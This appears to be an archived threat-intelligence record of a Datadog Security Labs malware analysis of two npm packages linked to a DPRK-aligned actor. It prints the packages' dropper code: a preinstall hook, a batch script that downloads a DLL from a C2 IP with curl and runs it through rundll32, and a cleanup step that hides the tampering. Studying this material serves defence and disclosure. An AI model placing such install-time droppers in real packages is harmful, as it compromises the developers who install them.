{
	"id": "954a07cb-94aa-4660-8e3b-d472b97c673b",
	"created_at": "2026-04-06T00:16:43.980428Z",
	"updated_at": "2026-04-10T13:12:19.880969Z",
	"deleted_at": null,
	"sha1_hash": "0e468821dad11cb368d401b76405e0a6b0f390a6",
	"title": "Stressed Pungsan: DPRK-aligned threat actor leverages npm for initial access | Datadog Security Labs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 765893,
	"plain_text": "Stressed Pungsan: DPRK-aligned threat actor leverages npm for initial access | Datadog Security Labs\r\nBy Sebastian Obregoso, Zack Allen, Datadog Security Research Team\r\nPublished: 2024-07-31 · Archived: 2026-04-05 14:25:59 UTC\r\nKey Points and Observations\r\nOn July 7, 2024, npm user nagasiren978 published two malicious packages to the npm registry on npmjs.org.\r\nThese packages, \"harthat-hash\" and \"harthat-api\", contain malicious code that installs additional malicious software from a command and control (C2) server.\r\nThis C2 server mostly served malicious batch scripts and one DLL, indicating a victim target set of Windows.\r\nThe tactics, techniques, and procedures (TTPs) behind the malicious packages, C2 infrastructure, and targeting sets align closely with what Microsoft calls MOONSTONE SLEET, an actor aligned with the Democratic People’s Republic of Korea (DPRK, also referred to as North Korea).\r\nWe internally name this cluster Stressed Pungsan. (We align nation-state threat actor clusters with their national dog breeds, and the Pungsan is a dog native to North Korea.)\r\nBackground\r\nThe Datadog Security Research team continuously tracks how threat actors abuse the software supply chain ecosystem to distribute malware and gain footholds in developer and cloud environments. Once access is established, these threat actors perform several actions on objective, including stealing personal information, API and cloud access keys, and moving laterally into other environments.\r\nTo help combat this threat, we’ve developed scalable package-scanning infrastructure for PyPI and npm leveraging our open-source GuardDog software. 
During regular scanning and triage operations, we discovered two packages that share infrastructure, tactics, techniques \u0026 procedures with Democratic People’s Republic of Korea (DPRK) aligned actors.\r\nIn particular, this cluster, which we named “Stressed Pungsan”, aligns closest with what Microsoft calls MOONSTONE SLEET.\r\nhttps://securitylabs.datadoghq.com/articles/stressed-pungsan-dprk-aligned-threat-actor-leverages-npm-for-initial-access/\r\nPage 1 of 8\n\nFigure: Attack Flow\r\nThe initial lead\r\nAs a part of our continuous effort to ensure that software from the npm and PyPI ecosystems is safe to use, we discovered two samples published to npm on July 7, 2024.\r\nharthat-hash v1.3.3 (published on July 7, 2024 at 16:19 UTC)\r\nharthat-api v1.3.1 (published on July 7, 2024 at 15:59 UTC)\r\nWe noticed three odd behaviors in these two packages.\r\nFirst, our detection rule npm-install-script shows that the package leverages the preinstall script in package.json to execute a .js file and then delete it.\r\nnpm-install-script: found 1 source code matches\r\n * The package.json has a script automatically running when the package is installed at harthat-hash-1.3.3/pack\r\n \"preinstall\": \"node deference.js \u0026\u0026 del deference.js\",\r\nSecondly, the shady-links rule detects a suspicious link being requested. 
However, the same line also shows that a payload is being downloaded.\r\nshady-links: found 1 source code matches\r\n * This package contains an URL to a domain with a suspicious extension at harthat-hash-1.3.3/package/deference\r\n const data = '@echo off\\ncurl -o Temp.b -L \"http://142.111.77.196/user/user.asp?id=237596\" \u003e nul 2\u003e\u00261\\nr\r\nFinally, the npm-dll-hijacking rule identifies that the downloaded payload is a DLL loaded into memory using the rundll32.exe binary.\r\nnpm-dll-hijacking: found 1 source code matches\r\n * This package manipulates a trusted application into loading a malicious DLL at harthat-hash-1.3.3/package/de\r\n const data = '@echo off\\ncurl -o Temp.b -L \"http://142.111.77.196/user/user.asp?id=237596\" \u003e nul 2\u003e\u00261\\nr\r\nThese two packages are almost identical, the only difference being the value of the id parameter, as shown below.\r\nharthat-hash-1.3.3: http://142.111.77.196/user/user.asp?id=237596\r\nharthat-api-1.3.1: http://142.111.77.196/user/user.asp?id=G6A822B\r\nDuplicating legitimate code\r\nWhile the name resembles the Hardhat npm package (an Ethereum development utility), its content does not indicate any intention to typosquat it. The malicious package reuses code from a well-known GitHub repository called node-config, with over 6,000 stars and 500 forks, known on npm as config. 
Both packages make use of the code version tag v3.3.9, dated to two years ago (regardless of the version shown next), which is nearly identical except for the modifications shown below:\r\n--- harthat-api-1.3.1/package/package.json\r\n+++ node-config/package.json\r\n@@ -1,6 +1,6 @@\r\n {\r\n- \"name\": \"harthat-api\",\r\n- \"version\": \"1.3.1\",\r\n+ \"name\": \"config\",\r\n+ \"version\": \"3.3.8\",\r\n \"main\": \"./lib/config.js\",\r\n \"description\": \"Configuration control for production node deployments\",\r\n \"author\": \"Loren West \u003copen_source@lorenwest.com\u003e\",\r\n@@ -47,7 +47,6 @@\r\n \"node\": \"\u003e= 10.0.0\"\r\n },\r\n \"scripts\": {\r\n- \"preinstall\": \"node deference.js \u0026\u0026 del deference.js\",\r\n \"test\": \"./node_modules/vows/bin/vows test/*.js --spec\"\r\n }\r\n }\r\nOnly in harthat-api-1.3.1/package: deference.js\r\nOnly in harthat-api-1.3.1/package: pk.json\r\nIn the following sections we will dive into the details of the deference.js and pk.json files.\r\nPackage analysis\r\nThe preinstall script runs the deference.js file, which contains the following excerpt of code:\r\nconst data = '@echo off\\ncurl -o Temp.b -L \"http://142.111.77.196/user/user.asp?id=G6A822B\" \u003e nul 2\u003e\u00261\\nrename\r\nif (osType === 'Windows_NT') {\r\n  const fileName = 'package.bat';\r\n  // Write the batch payload to disk, then run it and remove it\r\n  fs.writeFile(fileName, data, (err) =\u003e {\r\n    if (!err) {\r\n      if (!err) {\r\n        const child = exec(`\"${fileName}\"`, (error, stdout, stderr) =\u003e {\r\n          if (error) {\r\n            return;\r\n          }\r\n          if (stderr) {\r\n            return;\r\n          }\r\n          // Delete the batch file once it has run\r\n          fs.unlink(fileName, (err) =\u003e {\r\n          });\r\n        });\r\n      }\r\n    }\r\n  });\r\n}\r\nThis piece creates a file called package.bat with the content of the data variable and executes it.\r\nBreaking down the contents of this variable, the threat actor uses curl, a command line tool installed on 
many systems for making HTTP requests, to retrieve a file called Temp.b.\r\ncurl -o Temp.b -L \"http://142.111.77.196/user/user.asp?id=G6A822B\" \u003e nul 2\u003e\u00261\r\nThe script then renames the file to package.db, which turns out to be a Windows Dynamic-Link Library (DLL).\r\nrename Temp.b package.db \u003e nul 2\u003e\u00261\r\nNext, the threat actor makes use of the rundll32.exe executable to load this DLL and execute its code. This technique is known as “System Binary Proxy Execution: Rundll32” and aims to evade system defenses by using the trusted rundll32 system binary, which allows a threat actor to run arbitrary DLLs.\r\nrundll32 package.db,GenerateKey 1234\r\nAfter the payload execution concludes, the script deletes the .js file and replaces the package.json file with pk.json, which contains the original content of the node-config project.\r\ndel \"package.db\"\r\nif exist \"pk.json\"\r\n(\r\ndel \"package.json\" \u003e nul 2\u003e\u00261\r\nrename \"pk.json\" \"package.json\" \u003e nul 2\u003e\u00261\r\n)\r\nThe variable we examined is thus written to a .bat file called 'package.bat' and executed only if the package is being installed on a Windows system.\r\nThe malicious DLL file\r\nIn previous campaigns from this threat actor, code within the dropper scripts performed a simple XOR decoding routine to decode this binary. In the campaign we analyzed this technique was absent, and the DLL was instead delivered without obfuscation.\r\nThe DLL exports two functions: GenerateKey and its assumed Unicode-compatible equivalent GenerateKeyW.\r\nStatic analysis shows that the malware author opted to write code for GenerateKeyW, suggesting that they expect all input to be Unicode. 
At the dropper stage, we can see the command to call the exported function GenerateKey with an argument of 1234.\r\nFigure: List of exported functions from IDA Pro\r\nInitial static analysis of the DLL revealed Windows API calls to suspicious functions like IsDebuggerPresent, GetTickCount, and GetActiveWindow, which are frequently used for anti-debugging and anti-reverse-engineering purposes. Closer inspection shows that the developer opted to statically link the Microsoft C runtime (CRT), within which are benign library functions that make the aforementioned Windows API calls. This is a simple technique to ensure portability of the DLL, effectively allowing it to execute on a broader range of target systems. More information about this technique can be found in CaptMeelo's blog post. This also explains why the DLL isn’t currently detected by any vendors on VirusTotal, despite containing these suspicious API calls.\r\nObserving the exported functions allowed us to focus our analysis on GenerateKeyW. After identifying the function itself, we noticed that it does not seem to contain any malicious code. The only code present was a call to return, essentially exiting the function shortly after it’s called.\r\nFigure: Disassembly showing contents of GenerateKeyW\r\nAfter discovering this lack of functionality, we suspected that the DLL must be self-modifying and that the GenerateKeyW function would be populated with malicious logic at runtime. We conducted additional static analysis in the hope that this would lead us to hidden logic within the DLL, but this effort was unsuccessful.\r\nWe also conducted dynamic analysis of the DLL, both in a debugger and on the host itself, in the hope that we would observe some malicious behaviours. 
We saw no evidence of the code modifying itself at runtime, and traditional dynamic analysis techniques did not reveal any additional malicious behavior.\r\nThis led us to the conclusion that the DLL is not weaponized and that the threat actor is either testing their command-and-control (C2) or payload delivery infrastructure, or has mistakenly pushed out an unfinished version.\r\nReusing fake authors\r\nBoth packages were published by the same author, who removed the package a few hours after publishing it. This methodology is sometimes used by this threat actor and seems to allow them to publish faster and avoid being blocked on the package manager site.\r\nFigure: npm author\r\nHow can Datadog help\r\nDatadog Software Composition Analysis (SCA) customers can easily verify if this package is installed in their infrastructure by running this query in the Library Risk explorer: library_name:(harthat-api OR harthat-hash) Status:Open\r\nFigure: SCA finding\r\nIf you discover your system is impacted, consider what credentials and underlying infrastructure could be affected. It is important to take immediate measures such as rotating credentials, isolating the application, and investigating potential spread.\r\nWe also published the packages to our malicious package dataset, linked below, which is leveraged by OpenSSF and is generated into OSV feeds to check your infrastructure for infection.\r\nConclusion\r\nThreat actors are increasingly turning to malicious npm packages as a way to compromise targets. This tactic is steadily on the rise, with threat actors often smuggling malicious code within seemingly legitimate packages that copy existing content. 
The package's short presence in the index suggests the threat actor may have pulled it themselves, possibly having achieved their goal.\r\nIndicators of Compromise\r\nIP Address | Purpose\r\n142.111.77[.]196 | Download of malicious payload\r\nFilename | SHA256 | First Seen Date\r\nTemp.b (also known as package.db) | d2a74db6b9c900ad29a81432af72eee8ed4e22bf61055e7e8f7a5f1a33778277 | 2024-07-03 05:57:16 UTC\r\nSource: https://securitylabs.datadoghq.com/articles/stressed-pungsan-dprk-aligned-threat-actor-leverages-npm-for-initial-access/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://securitylabs.datadoghq.com/articles/stressed-pungsan-dprk-aligned-threat-actor-leverages-npm-for-initial-access/"
	],
	"report_names": [
		"stressed-pungsan-dprk-aligned-threat-actor-leverages-npm-for-initial-access"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "aa73cd6a-868c-4ae4-a5b2-7cb2c5ad1e9d",
			"created_at": "2022-10-25T16:07:24.139848Z",
			"updated_at": "2026-04-10T02:00:04.878798Z",
			"deleted_at": null,
			"main_name": "Safe",
			"aliases": [],
			"source_name": "ETDA:Safe",
			"tools": [
				"DebugView",
				"LZ77",
				"OpenDoc",
				"SafeDisk",
				"TypeConfig",
				"UPXShell",
				"UsbDoc",
				"UsbExe"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "45e6e2b3-43fe-44cd-8025-aea18a7f488f",
			"created_at": "2024-06-20T02:02:09.897489Z",
			"updated_at": "2026-04-10T02:00:04.769917Z",
			"deleted_at": null,
			"main_name": "Moonstone Sleet",
			"aliases": [
				"Storm-1789",
				"Stressed Pungsan"
			],
			"source_name": "ETDA:Moonstone Sleet",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "28523c53-1944-4ff0-bbdc-89b06e4e3c84",
			"created_at": "2024-11-01T02:00:52.752463Z",
			"updated_at": "2026-04-10T02:00:05.359782Z",
			"deleted_at": null,
			"main_name": "Moonstone Sleet",
			"aliases": [
				"Moonstone Sleet",
				"Storm-1789"
			],
			"source_name": "MITRE:Moonstone Sleet",
			"tools": [
				"Qilin"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "a2b92056-9378-4749-926b-7e10c4500dac",
			"created_at": "2023-01-06T13:46:38.430595Z",
			"updated_at": "2026-04-10T02:00:02.971571Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Operation DarkSeoul",
				"Bureau 121",
				"Group 77",
				"APT38",
				"NICKEL GLADSTONE",
				"G0082",
				"COPERNICIUM",
				"Moonstone Sleet",
				"Operation GhostSecret",
				"APT 38",
				"Appleworm",
				"Unit 121",
				"ATK3",
				"G0032",
				"ATK117",
				"NewRomanic Cyber Army Team",
				"Nickel Academy",
				"Sapphire Sleet",
				"Lazarus group",
				"Hastati Group",
				"Subgroup: Bluenoroff",
				"Operation Troy",
				"Black Artemis",
				"Dark Seoul",
				"Andariel",
				"Labyrinth Chollima",
				"Operation AppleJeus",
				"COVELLITE",
				"Citrine Sleet",
				"DEV-0139",
				"DEV-1222",
				"Hidden Cobra",
				"Bluenoroff",
				"Stardust Chollima",
				"Whois Hacking Team",
				"Diamond Sleet",
				"TA404",
				"BeagleBoyz",
				"APT-C-26"
			],
			"source_name": "MISPGALAXY:Lazarus Group",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434603,
	"ts_updated_at": 1775826739,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/0e468821dad11cb368d401b76405e0a6b0f390a6.pdf",
		"text": "https://archive.orkl.eu/0e468821dad11cb368d401b76405e0a6b0f390a6.txt",
		"img": "https://archive.orkl.eu/0e468821dad11cb368d401b76405e0a6b0f390a6.jpg"
	}
}